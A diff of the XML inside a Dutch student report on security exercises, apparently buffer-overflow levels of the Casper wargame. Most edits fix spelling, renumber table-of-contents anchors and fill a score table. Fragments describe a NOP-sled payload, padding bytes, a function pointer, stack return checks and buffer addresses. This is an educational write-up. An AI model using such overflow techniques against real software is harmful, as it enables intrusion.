+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{A40D9761-D3DA-4944-B538-A8B2BA7C06F0}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/verslag/verslag_dev_Sec.docx
+++ b/verslag/verslag_dev_Sec.docx
@@ -10,7 +10,6 @@
           <w:docPartUnique/>
         </w:docPartObj>
       </w:sdtPr>
-      <w:sdtEndPr/>
       <w:sdtContent>
         <w:p/>
         <w:tbl>
@@ -46,7 +45,6 @@
                 <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.openxmlformats.org/officeDocument/2006/extended-properties'" w:xpath="/ns0:Properties[1]/ns0:Company[1]" w:storeItemID="{6668398D-A668-4E3E-A5EB-62B293D839F1}"/>
                 <w:text/>
               </w:sdtPr>
-              <w:sdtEndPr/>
               <w:sdtContent>
                 <w:tc>
                   <w:tcPr>
@@ -82,7 +80,34 @@
                         <w:szCs w:val="24"/>
                         <w:lang w:val="nl-BE"/>
                       </w:rPr>
-                      <w:t>de toegepaste i</w:t>
+                      <w:t xml:space="preserve">de </w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
+                        <w:sz w:val="24"/>
+                        <w:szCs w:val="24"/>
+                        <w:lang w:val="nl-BE"/>
+                      </w:rPr>
+                      <w:t>T</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
+                        <w:sz w:val="24"/>
+                        <w:szCs w:val="24"/>
+                        <w:lang w:val="nl-BE"/>
+                      </w:rPr>
+                      <w:t xml:space="preserve">oegepaste </w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
+                        <w:sz w:val="24"/>
+                        <w:szCs w:val="24"/>
+                        <w:lang w:val="nl-BE"/>
+                      </w:rPr>
+                      <w:t>I</w:t>
                     </w:r>
                     <w:r>
                       <w:rPr>
@@ -119,7 +144,6 @@
                   <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' xmlns:ns1='http://purl.org/dc/elements/1.1/'" w:xpath="/ns0:coreProperties[1]/ns1:title[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
                   <w:text/>
                 </w:sdtPr>
-                <w:sdtEndPr/>
                 <w:sdtContent>
                   <w:p>
                     <w:pPr>
@@ -160,11 +184,9 @@
                 <w:placeholder>
                   <w:docPart w:val="ED513E90EE80484F9E1F77A4217F4244"/>
                 </w:placeholder>
-                <w:showingPlcHdr/>
                 <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' xmlns:ns1='http://purl.org/dc/elements/1.1/'" w:xpath="/ns0:coreProperties[1]/ns1:subject[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
                 <w:text/>
               </w:sdtPr>
-              <w:sdtEndPr/>
               <w:sdtContent>
                 <w:tc>
                   <w:tcPr>
@@ -189,9 +211,9 @@
                         <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
                         <w:sz w:val="24"/>
                         <w:szCs w:val="24"/>
-                        <w:lang w:val="nl-NL"/>
+                        <w:lang w:val="en-GB"/>
                       </w:rPr>
-                      <w:t>[Ondertitel van document]</w:t>
+                      <w:t xml:space="preserve">   </w:t>
                     </w:r>
                   </w:p>
                 </w:tc>
@@ -234,7 +256,6 @@
                   <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' xmlns:ns1='http://purl.org/dc/elements/1.1/'" w:xpath="/ns0:coreProperties[1]/ns1:creator[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
                   <w:text/>
                 </w:sdtPr>
-                <w:sdtEndPr/>
                 <w:sdtContent>
                   <w:p>
                     <w:pPr>
@@ -277,7 +298,6 @@
                     <w:calendar w:val="gregorian"/>
                   </w:date>
                 </w:sdtPr>
-                <w:sdtEndPr/>
                 <w:sdtContent>
                   <w:p>
                     <w:pPr>
@@ -295,7 +315,16 @@
                         <w:szCs w:val="28"/>
                         <w:lang w:val="en-GB"/>
                       </w:rPr>
-                      <w:t>R0627054</w:t>
+                      <w:t>r</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:color w:val="4472C4" w:themeColor="accent1"/>
+                        <w:sz w:val="28"/>
+                        <w:szCs w:val="28"/>
+                        <w:lang w:val="en-GB"/>
+                      </w:rPr>
+                      <w:t>0627054</w:t>
                     </w:r>
                   </w:p>
                 </w:sdtContent>
@@ -396,7 +425,7 @@
           <w:r>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc26704201" w:history="1">
+          <w:hyperlink w:anchor="_Toc26708925" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -424,7 +453,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc26704201 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26708925 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -467,7 +496,7 @@
               <w:lang/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc26704202" w:history="1">
+          <w:hyperlink w:anchor="_Toc26708926" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -494,7 +523,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc26704202 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26708926 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -537,7 +566,7 @@
               <w:lang/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc26704203" w:history="1">
+          <w:hyperlink w:anchor="_Toc26708927" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -565,7 +594,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc26704203 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26708927 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -608,7 +637,7 @@
               <w:lang/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc26704204" w:history="1">
+          <w:hyperlink w:anchor="_Toc26708928" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -636,7 +665,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc26704204 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26708928 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -679,7 +708,7 @@
               <w:lang/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc26704205" w:history="1">
+          <w:hyperlink w:anchor="_Toc26708929" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -707,7 +736,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc26704205 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26708929 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -750,7 +779,7 @@
               <w:lang/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc26704206" w:history="1">
+          <w:hyperlink w:anchor="_Toc26708930" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -778,7 +807,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc26704206 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26708930 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -821,7 +850,7 @@
               <w:lang/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc26704207" w:history="1">
+          <w:hyperlink w:anchor="_Toc26708931" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -849,7 +878,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc26704207 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26708931 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -892,7 +921,7 @@
               <w:lang/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc26704208" w:history="1">
+          <w:hyperlink w:anchor="_Toc26708932" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -927,7 +956,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc26704208 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26708932 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -970,7 +999,7 @@
               <w:lang/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc26704209" w:history="1">
+          <w:hyperlink w:anchor="_Toc26708933" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -998,7 +1027,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc26704209 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26708933 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1041,7 +1070,7 @@
               <w:lang/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc26704210" w:history="1">
+          <w:hyperlink w:anchor="_Toc26708934" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1069,7 +1098,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc26704210 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26708934 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1112,7 +1141,7 @@
               <w:lang/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc26704211" w:history="1">
+          <w:hyperlink w:anchor="_Toc26708935" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1140,7 +1169,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc26704211 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26708935 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1183,7 +1212,7 @@
               <w:lang/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc26704212" w:history="1">
+          <w:hyperlink w:anchor="_Toc26708936" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1211,7 +1240,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc26704212 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26708936 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1254,7 +1283,7 @@
               <w:lang/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc26704213" w:history="1">
+          <w:hyperlink w:anchor="_Toc26708937" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1282,7 +1311,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc26704213 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26708937 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1325,7 +1354,7 @@
               <w:lang/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc26704214" w:history="1">
+          <w:hyperlink w:anchor="_Toc26708938" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1360,7 +1389,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc26704214 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26708938 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1403,7 +1432,7 @@
               <w:lang/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc26704215" w:history="1">
+          <w:hyperlink w:anchor="_Toc26708939" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1431,7 +1460,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc26704215 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26708939 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1474,7 +1503,7 @@
               <w:lang/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc26704216" w:history="1">
+          <w:hyperlink w:anchor="_Toc26708940" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1502,7 +1531,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc26704216 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26708940 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1545,7 +1574,7 @@
               <w:lang/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc26704217" w:history="1">
+          <w:hyperlink w:anchor="_Toc26708941" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1573,7 +1602,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc26704217 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26708941 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1616,7 +1645,7 @@
               <w:lang/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc26704218" w:history="1">
+          <w:hyperlink w:anchor="_Toc26708942" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1644,7 +1673,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc26704218 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26708942 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1687,7 +1716,7 @@
               <w:lang/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc26704219" w:history="1">
+          <w:hyperlink w:anchor="_Toc26708943" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1715,7 +1744,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc26704219 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26708943 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1758,7 +1787,7 @@
               <w:lang/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc26704220" w:history="1">
+          <w:hyperlink w:anchor="_Toc26708944" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1793,7 +1822,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc26704220 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26708944 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1836,7 +1865,7 @@
               <w:lang/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc26704221" w:history="1">
+          <w:hyperlink w:anchor="_Toc26708945" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1864,7 +1893,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc26704221 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26708945 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1907,7 +1936,7 @@
               <w:lang/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc26704222" w:history="1">
+          <w:hyperlink w:anchor="_Toc26708946" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1935,7 +1964,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc26704222 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26708946 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1978,7 +2007,7 @@
               <w:lang/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc26704223" w:history="1">
+          <w:hyperlink w:anchor="_Toc26708947" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2006,7 +2035,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc26704223 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26708947 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2049,7 +2078,7 @@
               <w:lang/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc26704224" w:history="1">
+          <w:hyperlink w:anchor="_Toc26708948" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2077,7 +2106,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc26704224 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26708948 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2133,7 +2162,7 @@
           <w:lang w:val="en-GB"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc26704201"/>
+      <w:bookmarkStart w:id="0" w:name="_Toc26708925"/>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
@@ -2383,7 +2412,7 @@
               <w:rPr>
                 <w:lang w:val="en-GB"/>
               </w:rPr>
-              <w:t>0.5</w:t>
+              <w:t>1</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2441,6 +2470,12 @@
                 <w:lang w:val="en-GB"/>
               </w:rPr>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>2</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -2494,6 +2529,12 @@
                 <w:lang w:val="en-GB"/>
               </w:rPr>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>1</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -2556,6 +2597,12 @@
                 <w:lang w:val="en-GB"/>
               </w:rPr>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>16</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -2609,6 +2656,12 @@
                 <w:lang w:val="en-GB"/>
               </w:rPr>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>1</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -2665,6 +2718,12 @@
                 <w:lang w:val="en-GB"/>
               </w:rPr>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>4</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -2694,7 +2753,7 @@
         <w:pStyle w:val="Kop1"/>
         <w:jc w:val="both"/>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc26704202"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc26708926"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Casper4</w:t>
@@ -2709,7 +2768,7 @@
           <w:lang w:val="en-GB"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc26704203"/>
+      <w:bookmarkStart w:id="2" w:name="_Toc26708927"/>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
@@ -2743,7 +2802,13 @@
         <w:rPr>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
-        <w:t>Allereerst wordt er nagekeken of er een parameter meegegeven wordt. Indien dit niet het geval is gaat het een error bericht: “</w:t>
+        <w:t>E</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>erst wordt er nagekeken of er een parameter meegegeven wordt. Indien dit niet het geval is gaat het een error bericht: “</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -2900,7 +2965,7 @@
           <w:lang w:val="en-GB"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc26704204"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc26708928"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-GB"/>
@@ -3065,7 +3130,7 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="4" w:name="_Toc26704205"/>
+      <w:bookmarkStart w:id="4" w:name="_Toc26708929"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="nl-BE"/>
@@ -3501,7 +3566,19 @@
         <w:rPr>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
-        <w:t xml:space="preserve">De eerste 900 bytes bestaan NOP operaties, dit staat voor: </w:t>
+        <w:t xml:space="preserve">De eerste 900 bytes bestaan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">uit </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">NOP operaties, dit staat voor: </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -3679,7 +3756,19 @@
         <w:rPr>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
-        <w:t>Er zijn meerdere mogelijkheden mogelijk, zo kan de hoeveel NOP operaties en het aantal opvul bytes aangepast worden.</w:t>
+        <w:t xml:space="preserve">Er zijn meerdere </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>oplossingen</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> mogelijk, zo kan de hoeveel NOP operaties en het aantal opvulbytes aangepast worden.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3716,7 +3805,7 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc26704206"/>
+      <w:bookmarkStart w:id="5" w:name="_Toc26708930"/>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
@@ -3782,7 +3871,19 @@
         <w:rPr>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
-        <w:t xml:space="preserve">ode kan aangepast worden door gebruik maakt van de </w:t>
+        <w:t xml:space="preserve">ode kan aangepast worden door gebruik </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>te maken</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> van de </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3968,7 +4069,7 @@
         <w:rPr>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
-        <w:t xml:space="preserve"> ook overschreven worden. Bij elke functie return gaat gekeken worden of de </w:t>
+        <w:t xml:space="preserve"> ook overschreven worden. Bij elke functiereturn gaat gekeken worden of de </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -4074,7 +4175,7 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc26704207"/>
+      <w:bookmarkStart w:id="6" w:name="_Toc26708931"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="nl-BE"/>
@@ -4170,7 +4271,7 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc26704208"/>
+      <w:bookmarkStart w:id="7" w:name="_Toc26708932"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Casper</w:t>
@@ -4191,7 +4292,7 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc26704209"/>
+      <w:bookmarkStart w:id="8" w:name="_Toc26708933"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="nl-BE"/>
@@ -4275,7 +4376,19 @@
         <w:rPr>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
-        <w:t xml:space="preserve"> gevolgd met een functie pointer die als input parameter een pointer naar karakters aanvaard.</w:t>
+        <w:t xml:space="preserve"> gevolgd met een functie pointer die als input parameter een pointer naar karakters aanvaard</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>t</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4375,14 +4488,26 @@
         <w:rPr>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
-        <w:t xml:space="preserve"> functie pointer </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>gïnitialiseerd</w:t>
+        <w:t xml:space="preserve"> functiepointer </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>g</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>e</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>ïnitialiseerd</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -4534,7 +4659,7 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="9" w:name="_Toc26704210"/>
+      <w:bookmarkStart w:id="9" w:name="_Toc26708934"/>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
@@ -4679,7 +4804,7 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="10" w:name="_Toc26704211"/>
+      <w:bookmarkStart w:id="10" w:name="_Toc26708935"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="nl-BE"/>
@@ -4777,7 +4902,7 @@
         <w:rPr>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
-        <w:t xml:space="preserve"> zijn respectievelijk 0x8049bc8 en 0x80497e0. Beide deze adressen wijzen naar de start van de variabele. Door deze van elkaar af te trekken bekomen we de lengte van de buffer, dit is 1000 bytes. </w:t>
+        <w:t xml:space="preserve"> zijn respectievelijk 0x8049bc8 en 0x80497e0. Beide adressen wijzen naar de start van de variabele. Door deze van elkaar af te trekken bekomen we de lengte van de buffer, dit is 1000 bytes. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4924,7 +5049,7 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="11" w:name="_Toc26704212"/>
